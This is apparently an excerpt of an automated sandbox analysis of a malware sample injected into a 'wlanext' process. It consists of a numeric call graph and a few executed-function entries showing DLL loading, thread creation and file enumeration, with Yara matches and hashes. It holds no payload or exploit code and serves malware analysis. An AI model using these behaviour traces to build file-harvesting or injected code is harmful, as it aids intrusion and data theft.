33199 17c3df 33198->33199 33200 17d460 LdrLoadDll 33199->33200 33201 17c3ec 33200->33201 33201->33193 33203 17d460 LdrLoadDll 33202->33203 33204 17c42c 33203->33204 33207 c29fe0 LdrInitializeThunk 33204->33207 33205 16de94 33205->33196 33207->33205 33209 16e1df 33208->33209 33210 177400 LdrLoadDll 33208->33210 33211 16e1e6 SetErrorMode 33209->33211 33212 16e1ed 33209->33212 33210->33209 33211->33212 33212->33170 33287 16df90 33213->33287 33215 176946 33215->33174 33217 16c0ef 33216->33217 33218 16c0e9 33216->33218 33313 1697a0 33217->33313 33306 16d890 33218->33306 33221 16c0fc 33222 16c392 33221->33222 33223 17f6d0 3 API calls 33221->33223 33222->33182 33224 16c118 33223->33224 33225 16c12c 33224->33225 33226 16e160 2 API calls 33224->33226 33322 17c1a0 33225->33322 33226->33225 33229 16c260 33339 16c070 LdrLoadDll LdrInitializeThunk 33229->33339 33230 17c390 2 API calls 33231 16c1aa 33230->33231 33231->33229 33236 16c1b6 33231->33236 33233 16c27f 33234 16c287 33233->33234 33340 16bfe0 LdrLoadDll NtClose LdrInitializeThunk 33233->33340 33237 17c920 2 API calls 33234->33237 33236->33222 33239 16c209 33236->33239 33243 17c4a0 2 API calls 33236->33243 33240 16c291 33237->33240 33238 16c2a9 33238->33234 33242 16c2b0 33238->33242 33241 17c920 2 API calls 33239->33241 33240->33182 33244 16c226 33241->33244 33245 16c2c8 33242->33245 33341 16bf60 LdrLoadDll LdrInitializeThunk 33242->33341 33243->33239 33326 17b770 33244->33326 33342 17c220 LdrLoadDll 33245->33342 33249 16c23d 33249->33222 33329 167700 33249->33329 33250 16c2dc 33343 16bde0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33250->33343 33253 16c300 33255 16c34d 33253->33255 33344 17c250 LdrLoadDll 33253->33344 33346 17c2b0 LdrLoadDll 33255->33346 33258 16c35b 33260 17c920 2 API calls 33258->33260 33259 16c31e 33259->33255 33345 17c2e0 LdrLoadDll 33259->33345 33261 16c365 33260->33261 33263 17c920 2 API calls 33261->33263 33264 16c36f 33263->33264 33264->33222 33265 167700 3 API calls 33264->33265 33265->33222 33267 16e173 33266->33267 33373 17c320 33267->33373 33271 16dbd7 33270->33271 33272 16dbf7 33270->33272 33271->33272 33379 16d9d0 33271->33379 33277 16dc39 33272->33277 33399 16d810 33272->33399 33276 16dc6b 33278 16dc91 33276->33278 33422 17aeb0 12 API calls 33276->33422 33277->33276 33421 16d0a0 12 API calls 33277->33421 33423 1648c0 29 API calls 33278->33423 33279 16dca6 33279->33182 33285 176ff0 10 API calls 33285->33277 33286->33182 33288 16dfad 33287->33288 33294 17c450 33288->33294 33291 16dff5 33291->33215 33295 17d460 LdrLoadDll 33294->33295 33296 17c46c 33295->33296 33304 c299a0 LdrInitializeThunk 33296->33304 33297 16dfee 33297->33291 33299 17c4a0 33297->33299 33300 17d460 LdrLoadDll 33299->33300 33301 17c4bc 33300->33301 33305 c29780 LdrInitializeThunk 33301->33305 33302 16e01e 33302->33215 33304->33297 33305->33302 33347 16d120 33306->33347 33308 16d9b2 33309 17e5c0 2 API calls 33308->33309 33310 16d9c1 33309->33310 33310->33217 33312 16d8ae 33312->33308 33360 17b600 33312->33360 33315 1697bb 33313->33315 33314 1698db 33314->33221 33315->33314 33316 16ddd0 3 API calls 33315->33316 33317 1698bc 33316->33317 33318 1698ea 33317->33318 33319 1698d1 33317->33319 33320 17c920 2 API calls 33317->33320 33318->33221 33372 166300 LdrLoadDll 33319->33372 33320->33319 33323 17c1b6 33322->33323 33324 17d460 LdrLoadDll 33323->33324 33325 16c180 33324->33325 33325->33222 33325->33229 33325->33230 33327 16e160 2 API calls 33326->33327 33328 17b7a2 33327->33328 33328->33249 33330 167718 33329->33330 33331 16aca0 LdrLoadDll 33330->33331 33332 167733 33331->33332 33333 177400 LdrLoadDll 33332->33333 33334 167743 33333->33334 33335 16777d 33334->33335 33336 16774c PostThreadMessageW 33334->33336 33335->33182 33336->33335 33337 167760 33336->33337 33338 16776a PostThreadMessageW 33337->33338 33338->33335 33339->33233 33340->33238 33341->33245 33342->33250 33343->33253 33344->33259 33345->33255 33346->33258 33348 16d153 33347->33348 33365 16b2e0 33348->33365 33350 16d165 33369 16b450 33350->33369 33352 16d183 33353 16b450 LdrLoadDll 33352->33353 33354 16d199 33353->33354 33355 16df90 3 API calls 33354->33355 33356 16d1cf 33355->33356 33357 16d1d6 33356->33357 33358 17e600 2 API calls 33356->33358 33357->33312 33359 16d1e6 33358->33359 33359->33312 33361 177400 LdrLoadDll 33360->33361 33362 17b621 33361->33362 33363 17b647 33362->33363 33364 17b634 CreateThread 33362->33364 33363->33308 33364->33308 33366 16b307 33365->33366 33367 16aff0 LdrLoadDll 33366->33367 33368 16b343 33367->33368 33368->33350 33370 16aff0 LdrLoadDll 33369->33370 33371 16b469 33370->33371 33371->33352 33372->33314 33374 17c33c 33373->33374 33375 17d460 LdrLoadDll 33373->33375 33378 c29840 LdrInitializeThunk 33374->33378 33375->33374 33376 16e19e 33376->33182 33378->33376 33380 16da00 33379->33380 33424 1762f0 33380->33424 33382 16da4b 33462 1750d0 33382->33462 33384 16da51 33498 171f80 33384->33498 33386 16da57 33529 174160 33386->33529 33392 16da6b 33574 175970 33392->33574 33394 16da71 33600 16fb00 33394->33600 33396 16da89 33611 170b50 33396->33611 33400 16d87f 33399->33400 33401 16d828 33399->33401 33400->33279 33405 16d650 33400->33405 33401->33400 33402 170da0 10 API calls 33401->33402 33403 16d869 33402->33403 33403->33400 33949 170ff0 12 API calls 33403->33949 33406 16d66c 33405->33406 33420 16d74b 33405->33420 33409 17c920 2 API calls 33406->33409 33406->33420 33407 16d7e1 33408 16d7fe 33407->33408 33410 176ff0 10 API calls 33407->33410 33408->33277 33408->33285 33411 16d687 33409->33411 33410->33408 33950 16ca40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33411->33950 33413 16d7bb 33413->33407 33952 16cc00 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33413->33952 33415 16d6bf 33417 16aff0 LdrLoadDll 33415->33417 33418 16d6d0 33417->33418 33419 16aff0 LdrLoadDll 33418->33419 33419->33420 33420->33407 33951 16ca40 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33420->33951 33421->33276 33422->33278 33423->33279 33425 176318 33424->33425 33426 16aff0 LdrLoadDll 33425->33426 33427 176347 33426->33427 33616 16c810 33427->33616 33429 176381 33429->33382 33430 17637a 33430->33429 33431 16aff0 LdrLoadDll 33430->33431 33432 1763a9 33431->33432 33433 16aff0 LdrLoadDll 33432->33433 33434 1763cd 33433->33434 33627 16c8d0 33434->33627 33438 176433 33441 16aff0 LdrLoadDll 33438->33441 33439 17640a 33440 1765b6 33439->33440 33635 176040 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 33439->33635 33440->33382 33443 176453 33441->33443 33444 16c8d0 2 API calls 33443->33444 33445 176477 33444->33445 33446 1764bd 33445->33446 33448 176494 33445->33448 33449 175c50 10 API calls 33445->33449 33447 16c8d0 2 API calls 33446->33447 33451 1764ed 33447->33451 33448->33440 33636 176040 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 33448->33636 33449->33448 33452 176533 33451->33452 33453 17650a 33451->33453 33454 175c50 10 API calls 33451->33454 33456 16c8d0 2 API calls 33452->33456 33453->33440 33637 176040 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 33453->33637 33454->33453 33457 176592 33456->33457 33458 1765db 33457->33458 33459 1765af 33457->33459 33460 175c50 10 API calls 33457->33460 33458->33382 33459->33440 33638 176040 LdrLoadDll NtClose RtlFreeHeap LdrInitializeThunk LdrInitializeThunk 33459->33638 33460->33459 33463 175134 33462->33463 33464 16aff0 LdrLoadDll 33463->33464 33465 175201 33464->33465 33466 16c810 3 API calls 33465->33466 33468 175234 33466->33468 33467 17523b 33467->33384 33468->33467 33469 16aff0 LdrLoadDll 33468->33469 33470 175263 33469->33470 33471 16c8d0 2 API calls 33470->33471 33472 1752a3 33471->33472 33473 175c50 10 API calls 33472->33473 33495 1753c3 33472->33495 33474 1752c0 33473->33474 33475 1753d2 33474->33475 33654 174ef0 33474->33654 33476 17c920 2 API calls 33475->33476 33478 1753dc 33476->33478 33478->33384 33479 1752d8 33479->33475 33480 1752e3 33479->33480 33481 17e5c0 2 API calls 33480->33481 33482 17530c 33481->33482 33483 175315 33482->33483 33484 17532b 33482->33484 33485 17c920 2 API calls 33483->33485 33683 174de0 CoInitialize 33484->33683 33487 17531f 33485->33487 33487->33384 33488 175339 33685 17c630 33488->33685 33490 1753b2 33491 17c920 2 API calls 33490->33491 33492 1753bc 33491->33492 33494 17e3f0 2 API calls 33492->33494 33494->33495 33495->33384 33496 17c630 2 API calls 33497 175357 33496->33497 33497->33490 33497->33496 33690 174d10 LdrLoadDll RtlFreeHeap 33497->33690 33499 171fa8 33498->33499 33500 17e5c0 2 API calls 33499->33500 33502 172008 33500->33502 33501 172011 33501->33386 33502->33501 33692 1713e0 33502->33692 33504 17203a 33505 17205a 33504->33505 33722 1716f0 LdrLoadDll 33504->33722 33506 172078 33505->33506 33724 173c60 12 API calls 33505->33724 33514 172092 33506->33514 33726 16adf0 LdrLoadDll 33506->33726 33508 172048 33508->33505 33723 171d00 10 API calls 33508->33723 33510 17206c 33725 173c60 12 API calls 33510->33725 33515 1713e0 12 API calls 33514->33515 33516 1720bf 33515->33516 33528 1720e0 33516->33528 33727 1716f0 LdrLoadDll 33516->33727 33518 1720ce 33518->33528 33728 171d00 10 API calls 33518->33728 33521 17e3f0 2 API calls 33524 172122 33521->33524 33522 1720f2 33730 173c60 12 API calls 33522->33730 33523 172118 33523->33521 33524->33386 33527 1720fe 33527->33523 33731 16adf0 LdrLoadDll 33527->33731 33528->33527 33729 173c60 12 API calls 33528->33729 33530 174186 33529->33530 33531 16aff0 LdrLoadDll 33530->33531 33532 1741b5 33531->33532 33533 16aff0 LdrLoadDll 33532->33533 33534 1741e1 33532->33534 33533->33534 33751 16e3b0 33534->33751 33537 1742c5 33538 16da5f 33537->33538 33756 16e3f0 33537->33756 33767 173e70 33537->33767 33540 1753f0 33538->33540 33541 174160 12 API calls 33540->33541 33542 16da65 33541->33542 33543 172e80 33542->33543 33544 172ea2 33543->33544 33545 16aff0 LdrLoadDll 33544->33545 33546 17306d 33545->33546 33547 16aff0 LdrLoadDll 33546->33547 33548 17307e 33547->33548 33549 16aec0 LdrLoadDll 33548->33549 33550 173095 33549->33550 33847 172d50 33550->33847 33553 172d50 13 API calls 33554 17310b 33553->33554 33555 172d50 13 API calls 33554->33555 33556 173123 33555->33556 33557 172d50 13 API calls 33556->33557 33558 17313b 33557->33558 33559 172d50 13 API calls 33558->33559 33560 173153 33559->33560 33561 172d50 13 API calls 33560->33561 33562 17316e 33561->33562 33563 173188 33562->33563 33564 172d50 13 API calls 33562->33564 33563->33392 33565 1731bc 33564->33565 33566 172d50 13 API calls 33565->33566 33567 1731f9 33566->33567 33568 172d50 13 API calls 33567->33568 33569 173236 33568->33569 33570 172d50 13 API calls 33569->33570 33571 173273 33570->33571 33572 172d50 13 API calls 33571->33572 33573 1732b0 33572->33573 33573->33392 33575 17598d 33574->33575 33576 16aca0 LdrLoadDll 33575->33576 33577 1759a8 33576->33577 33578 177400 LdrLoadDll 33577->33578 33597 175b76 33577->33597 33579 1759d2 33578->33579 33580 177400 LdrLoadDll 33579->33580 33581 1759e5 33580->33581 33582 177400 LdrLoadDll 33581->33582 33583 1759f8 33582->33583 33584 177400 LdrLoadDll 33583->33584 33585 175a0b 33584->33585 33586 177400 LdrLoadDll 33585->33586 33587 175a21 33586->33587 33588 177400 LdrLoadDll 33587->33588 33589 175a34 33588->33589 33590 177400 LdrLoadDll 33589->33590 33591 175a47 33590->33591 33592 177400 LdrLoadDll 33591->33592 33593 175a5a 33592->33593 33594 177400 LdrLoadDll 33593->33594 33595 175a6f 33594->33595 33596 175c50 10 API calls 33595->33596 33595->33597 33599 175af1 33596->33599 33597->33394 33599->33597 33862 175530 LdrLoadDll 33599->33862 33601 16fb1b 33600->33601 33602 16fb10 33600->33602 33863 16e810 33601->33863 33603 17e5c0 2 API calls 33602->33603 33603->33601 33605 16fb31 33605->33396 33606 16fb2a 33606->33605 33608 16fb50 33606->33608 33872 16f8a0 33606->33872 33609 16fb68 33608->33609 33610 17e3f0 2 API calls 33608->33610 33609->33396 33610->33609 33891 1708d0 33611->33891 33613 170b5d 33914 1705b0 33613->33914 33615 16da9b 33615->33272 33617 16c83c 33616->33617 33618 17c670 LdrLoadDll 33617->33618 33619 16c855 33618->33619 33620 16c85c 33619->33620 33639 17c6b0 33619->33639 33620->33430 33624 16c897 33625 17c920 2 API calls 33624->33625 33626 16c8ba 33625->33626 33626->33430 33628 16c8f5 33627->33628 33648 17c520 33628->33648 33631 175c50 33632 175ccd 33631->33632 33633 176ff0 10 API calls 33632->33633 33634 175e49 33632->33634 33633->33634 33634->33439 33635->33438 33636->33446 33637->33452 33638->33458 33640 17d460 LdrLoadDll 33639->33640 33641 17c6cc 33640->33641 33647 c29710 LdrInitializeThunk 33641->33647 33642 16c87f 33642->33620 33644 17cca0 33642->33644 33645 17d460 LdrLoadDll 33644->33645 33646 17ccbf 33645->33646 33646->33624 33647->33642 33649 17d460 LdrLoadDll 33648->33649 33650 17c53c 33649->33650 33653 c296d0 LdrInitializeThunk 33650->33653 33651 16c969 33651->33438 33651->33631 33653->33651 33655 174f0c 33654->33655 33656 16aca0 LdrLoadDll 33655->33656 33657 174f27 33656->33657 33658 174f30 33657->33658 33659 177400 LdrLoadDll 33657->33659 33658->33479 33660 174f47 33659->33660 33661 177400 LdrLoadDll 33660->33661 33662 174f5c 33661->33662 33663 177400 LdrLoadDll 33662->33663 33664 174f6f 33663->33664 33665 177400 LdrLoadDll 33664->33665 33666 174f82 33665->33666 33667 177400 LdrLoadDll 33666->33667 33668 174f98 33667->33668 33669 177400 LdrLoadDll 33668->33669 33670 174fab 33669->33670 33671 16aca0 LdrLoadDll 33670->33671 33673 174fd4 33671->33673 33672 175070 33672->33479 33673->33672 33674 177400 LdrLoadDll 33673->33674 33675 174ff8 33674->33675 33676 16aca0 LdrLoadDll 33675->33676 33677 17502d 33676->33677 33677->33672 33678 177400 LdrLoadDll 33677->33678 33679 17504a 33678->33679 33680 177400 LdrLoadDll 33679->33680 33681 17505d 33680->33681 33682 177400 LdrLoadDll 33681->33682 33682->33672 33684 174e45 33683->33684 33684->33488 33686 17d460 LdrLoadDll 33685->33686 33687 17c64c 33686->33687 33691 c29610 LdrInitializeThunk 33687->33691 33688 17c66b 33688->33497 33690->33497 33691->33688 33693 171478 33692->33693 33694 16aff0 LdrLoadDll 33693->33694 33695 171516 33694->33695 33696 16aff0 LdrLoadDll 33695->33696 33697 171531 33696->33697 33698 16c8d0 2 API calls 33697->33698 33699 171556 33698->33699 33700 17169d 33699->33700 33744 17c5b0 33699->33744 33701 1716ae 33700->33701 33732 170da0 33700->33732 33701->33504 33705 171693 33706 17c920 2 API calls 33705->33706 33706->33700 33707 17158f 33708 17c920 2 API calls 33707->33708 33709 1715c9 33708->33709 33749 17e690 LdrLoadDll 33709->33749 33711 1715ff 33711->33701 33712 16c8d0 2 API calls 33711->33712 33713 171625 33712->33713 33713->33701 33714 17c5b0 2 API calls 33713->33714 33715 17164a 33714->33715 33716 171651 33715->33716 33717 17167d 33715->33717 33719 17c920 2 API calls 33716->33719 33718 17c920 2 API calls 33717->33718 33720 171687 33718->33720 33721 17165b 33719->33721 33720->33504 33721->33504 33722->33508 33723->33505 33724->33510 33725->33506 33726->33514 33727->33518 33728->33528 33729->33522 33730->33527 33731->33523 33733 170dc5 33732->33733 33734 16aff0 LdrLoadDll 33733->33734 33735 170e80 33734->33735 33736 16aff0 LdrLoadDll 33735->33736 33737 170ea4 33736->33737 33738 176ff0 10 API calls 33737->33738 33740 170ef7 33738->33740 33739 170fb1 33739->33701 33740->33739 33741 16aff0 LdrLoadDll 33740->33741 33742 170f5e 33741->33742 33743 176ff0 10 API calls 33742->33743 33743->33739 33745 17d460 LdrLoadDll 33744->33745 33746 17c5cc 33745->33746 33750 c29650 LdrInitializeThunk 33746->33750 33747 171584 33747->33705 33747->33707 33749->33711 33750->33747 33752 177400 LdrLoadDll 33751->33752 33753 16e3cf 33752->33753 33754 16e3d6 GetFileAttributesW 33753->33754 33755 16e3e1 33753->33755 33754->33755 33755->33537 33757 16e7a2 33756->33757 33758 16e405 33756->33758 33757->33537 33758->33757 33759 176ff0 10 API calls 33758->33759 33760 16e72d 33759->33760 33760->33757 33761 176ff0 10 API calls 33760->33761 33762 16e761 33761->33762 33762->33757 33763 16e773 33762->33763 33765 16e7b2 33762->33765 33764 176ff0 10 API calls 33763->33764 33764->33757 33765->33757 33766 176ff0 10 API calls 33765->33766 33766->33757 33791 17ac30 33767->33791 33769 173edb 33769->33537 33770 173e86 33770->33769 33771 173ee7 33770->33771 33772 173ea5 33770->33772 33775 16aff0 LdrLoadDll 33771->33775 33773 173ead 33772->33773 33774 173eca 33772->33774 33776 17e3f0 2 API calls 33773->33776 33777 17e3f0 2 API calls 33774->33777 33778 173ef8 33775->33778 33779 173ebe 33776->33779 33777->33769 33780 176ff0 10 API calls 33778->33780 33779->33537 33781 173f0f 33780->33781 33831 1732c0 33781->33831 33783 173f1a 33787 174018 33783->33787 33788 173f32 33783->33788 33784 173fff 33785 17e3f0 2 API calls 33784->33785 33786 174123 33785->33786 33786->33537 33787->33784 33842 173850 11 API calls 33787->33842 33788->33784 33841 173850 11 API calls 33788->33841 33792 17ac3e 33791->33792 33793 17ac45 33791->33793 33792->33770 33794 16aca0 LdrLoadDll 33793->33794 33795 17ac77 33794->33795 33796 17ac86 33795->33796 33843 17a720 LdrLoadDll 33795->33843 33798 17e5c0 2 API calls 33796->33798 33800 17ae3f 33796->33800 33799 17ac9f 33798->33799 33799->33800 33801 17acb4 33799->33801 33802 17adee 33799->33802 33800->33770 33844 1733a0 LdrLoadDll 33801->33844 33804 17ae91 33802->33804 33805 17adf8 33802->33805 33806 17e3f0 2 API calls 33804->33806 33845 1733a0 LdrLoadDll 33805->33845 33806->33800 33808 17accb 33810 177400 LdrLoadDll 33808->33810 33809 17ae0f 33846 17a0b0 LdrLoadDll 33809->33846 33812 17ace1 33810->33812 33814 177400 LdrLoadDll 33812->33814 33813 17ae25 33817 177400 LdrLoadDll 33813->33817 33815 17acf7 33814->33815 33816 177400 LdrLoadDll 33815->33816 33818 17ad0d 33816->33818 33817->33800 33819 177400 LdrLoadDll 33818->33819 33820 17ad26 33819->33820 33821 177400 LdrLoadDll 33820->33821 33822 17ad3c 33821->33822 33823 177400 LdrLoadDll 33822->33823 33824 17ad52 33823->33824 33825 177400 LdrLoadDll 33824->33825 33826 17ad68 33825->33826 33827 177400 LdrLoadDll 33826->33827 33828 17ad8e 33827->33828 33828->33800 33829 17e3f0 2 API calls 33828->33829 33830 17ade2 33829->33830 33830->33770 33832 176ff0 10 API calls 33831->33832 33834 1732d6 33831->33834 33832->33834 33833 1732e3 33833->33783 33834->33833 33835 176ff0 10 API calls 33834->33835 33836 1732f4 33835->33836 33836->33833 33837 176ff0 10 API calls 33836->33837 33838 17330f 33837->33838 33839 17e3f0 2 API calls 33838->33839 33840 17331c 33839->33840 33840->33783 33841->33788 33842->33787 33843->33796 33844->33808 33845->33809 33846->33813 33848 172d79 33847->33848 33849 177400 LdrLoadDll 33848->33849 33850 172db0 33849->33850 33851 177400 LdrLoadDll 33850->33851 33852 172dc8 33851->33852 33853 177400 LdrLoadDll 33852->33853 33855 172de4 33853->33855 33854 172e6c 33854->33553 33855->33854 33856 172e0e FindFirstFileW 33855->33856 33856->33854 33860 172e29 33856->33860 33857 172e53 FindNextFileW 33858 172e65 FindClose 33857->33858 33857->33860 33858->33854 33860->33857 33861 172c30 13 API calls 33860->33861 33861->33860 33862->33599 33864 16e830 33863->33864 33865 16e828 33863->33865 33866 17ac30 3 API calls 33864->33866 33865->33606 33867 16e843 33866->33867 33867->33865 33868 16aff0 LdrLoadDll 33867->33868 33869 16e8cd 33868->33869 33870 16aff0 LdrLoadDll 33869->33870 33871 16e8de 33870->33871 33871->33606 33873 16f8c7 33872->33873 33874 177400 LdrLoadDll 33873->33874 33875 16f976 33874->33875 33876 16f981 GetFileAttributesW 33875->33876 33877 16faef 33875->33877 33876->33877 33881 16f993 33876->33881 33877->33606 33878 16e3f0 10 API calls 33878->33881 33880 16aff0 LdrLoadDll 33880->33881 33881->33877 33881->33878 33881->33880 33882 1732c0 10 API calls 33881->33882 33885 17aad0 33881->33885 33889 17a960 11 API calls 33881->33889 33890 17a800 11 API calls 33881->33890 33882->33881 33886 17aae6 33885->33886 33888 17abe6 33885->33888 33887 176ff0 10 API calls 33886->33887 33886->33888 33887->33886 33888->33881 33889->33881 33890->33881 33892 1708f5 33891->33892 33893 16aff0 LdrLoadDll 33892->33893 33894 17095a 33893->33894 33895 16aff0 LdrLoadDll 33894->33895 33896 1709a8 33895->33896 33897 16e3b0 2 API calls 33896->33897 33898 1709ef 33897->33898 33899 1709f6 33898->33899 33900 17ac30 3 API calls 33898->33900 33899->33613 33902 170a04 33900->33902 33901 170a0d 33901->33613 33902->33901 33903 16aff0 LdrLoadDll 33902->33903 33906 170a5c 33903->33906 33904 16e3f0 10 API calls 33904->33906 33905 17aad0 10 API calls 33905->33906 33906->33904 33906->33905 33909 170ae1 33906->33909 33930 170010 33906->33930 33908 16e3f0 10 API calls 33908->33909 33909->33908 33911 170b39 33909->33911 33941 170370 33909->33941 33912 17e3f0 2 API calls 33911->33912 33913 170b40 33912->33913 33913->33613 33915 1705c6 33914->33915 33916 1705d1 33914->33916 33917 17e5c0 2 API calls 33915->33917 33918 16e810 3 API calls 33916->33918 33917->33916 33920 1705e0 33918->33920 33919 1705e7 33919->33615 33920->33919 33921 16e3b0 2 API calls 33920->33921 33922 1708a0 33920->33922 33925 17aad0 10 API calls 33920->33925 33926 16e3f0 10 API calls 33920->33926 33927 170010 11 API calls 33920->33927 33928 16aff0 LdrLoadDll 33920->33928 33929 170370 10 API calls 33920->33929 33921->33920 33923 1708b9 33922->33923 33924 17e3f0 2 API calls 33922->33924 33923->33615 33924->33923 33925->33920 33926->33920 33927->33920 33928->33920 33929->33920 33931 170036 33930->33931 33932 176ff0 10 API calls 33931->33932 33933 170092 33932->33933 33934 1732c0 10 API calls 33933->33934 33935 17009d 33934->33935 33937 170220 33935->33937 33939 1700bb 33935->33939 33936 170205 33936->33906 33937->33936 33948 16fee0 11 API calls 33937->33948 33939->33936 33947 16fee0 11 API calls 33939->33947 33942 170396 33941->33942 33943 176ff0 10 API calls 33942->33943 33944 170407 33943->33944 33945 1732c0 10 API calls 33944->33945 33946 170412 33945->33946 33946->33909 33947->33939 33948->33937 33949->33400 33950->33415 33951->33413 33952->33407 33953 17b4c0 33954 17e370 2 API calls 33953->33954 33956 17b4fb 33953->33956 33954->33956 33955 17b5f6 33956->33955 33957 16aca0 LdrLoadDll 33956->33957 33958 17b53b 33957->33958 33959 177400 LdrLoadDll 33958->33959 33963 17b55a 33959->33963 33960 17b570 Sleep 33960->33963 33963->33955 33963->33960 33964 17b130 LdrLoadDll 33963->33964 33965 17b310 LdrLoadDll 33963->33965 33964->33963 33965->33963 33966 17bcc0 33967 17e5c0 2 API calls 33966->33967 33968 17bcd7 33967->33968 33987 1692f0 33968->33987 33970 17bcf2 33971 17bd27 33970->33971 33972 17bd13 33970->33972 33975 17e370 2 API calls 33971->33975 33973 17e3f0 2 API calls 33972->33973 33974 17bd1d 33973->33974 33976 17bd8e 33975->33976 33977 17e370 2 API calls 33976->33977 33979 17bda7 33977->33979 33984 17c077 33979->33984 33993 17e3b0 LdrLoadDll 33979->33993 33980 17c05c 33981 17c063 33980->33981 33980->33984 33982 17e3f0 2 API calls 33981->33982 33983 17c06d 33982->33983 33985 17e3f0 2 API calls 33984->33985 33986 17c0cc 33985->33986 33988 169315 33987->33988 33989 16aca0 LdrLoadDll 33988->33989 33990 169348 33989->33990 33991 16c810 3 API calls 33990->33991 33992 16936d 33990->33992 33991->33992 33992->33970 33993->33980

                                                                                        Executed Functions

                                                                                        Function 00172D49 Relevance: 4.6, APIs: 3, Instructions: 103fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 00172E1F
                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 00172E5E
                                                                                        • FindClose.KERNELBASE(?), ref: 00172E69
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3541575487-0
                                                                                        • Opcode ID: 7bf9a2ea2d019fd2711727f866a91fe589f847e45e388237c1905acebcc60c99
                                                                                        • Instruction ID: 40fe5511043a5928960df2cf0f88e2b8e78e33fb779ba7f520871e1c5b1c7665
                                                                                        • Opcode Fuzzy Hash: 7bf9a2ea2d019fd2711727f866a91fe589f847e45e388237c1905acebcc60c99
                                                                                        • Instruction Fuzzy Hash: 69316271900308ABDB21DF64CC89FEF77B8EF54705F148599F90DA7181EB70AA858BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00172D50 Relevance: 4.6, APIs: 3, Instructions: 101fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 00172E1F
                                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 00172E5E
                                                                                        • FindClose.KERNELBASE(?), ref: 00172E69
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 3541575487-0
                                                                                        • Opcode ID: 7bd69b838b07ebbba2787bfeaa60ec2d51fc86635eaf69c5db9f959b9fc96209
                                                                                        • Instruction ID: aa6a3698157ab318a84173bdf45011458445bb4c8879402ee2d30f4d7fd7914d
                                                                                        • Opcode Fuzzy Hash: 7bd69b838b07ebbba2787bfeaa60ec2d51fc86635eaf69c5db9f959b9fc96209
                                                                                        • Instruction Fuzzy Hash: B8314271900348BBDB21DF64CC89FEB77BCAF54705F148599F90DA7181EB70AA858BA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017C7EA Relevance: 1.6, APIs: 1, Instructions: 73filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,0017715C,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,0017715C,00000000,00000005,00000060,00000000,00000000), ref: 0017C83D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: 9cd8a43f64e31843e306f9b38ad9d4e328382c2e543e31fc07cf6339be309fc3
                                                                                        • Instruction ID: 559904fd747c6e5cdcd8a253c2c07d0e9f2cd4b5a7e5eb0e9e7e0cfd1411c82f
                                                                                        • Opcode Fuzzy Hash: 9cd8a43f64e31843e306f9b38ad9d4e328382c2e543e31fc07cf6339be309fc3
                                                                                        • Instruction Fuzzy Hash: 8021ACB2200108ABCB18DF99EC84DEB77FDAF8C754F158248BA0DA7255D630E811CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0017C7F0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000005,00000000,0017715C,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,0017715C,00000000,00000005,00000060,00000000,00000000), ref: 0017C83D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.570970656.0000000000160000.00000040.80000000.00040000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_160000_wlanext.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID:
                                                                                        • API String ID: 823142352-0
                                                                                        • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                                                        • Instruction ID: 12a0b0305fd33dfa632e7e5afd8ef0e16dc15319cbeaf115485e29ca5b4f75da
                                                                                        • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                                                        • Instruction Fuzzy Hash: 9AF062B2215208ABCB58DF99DC85EDB77ADAF8C754F118248BA0D97241D630F851CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

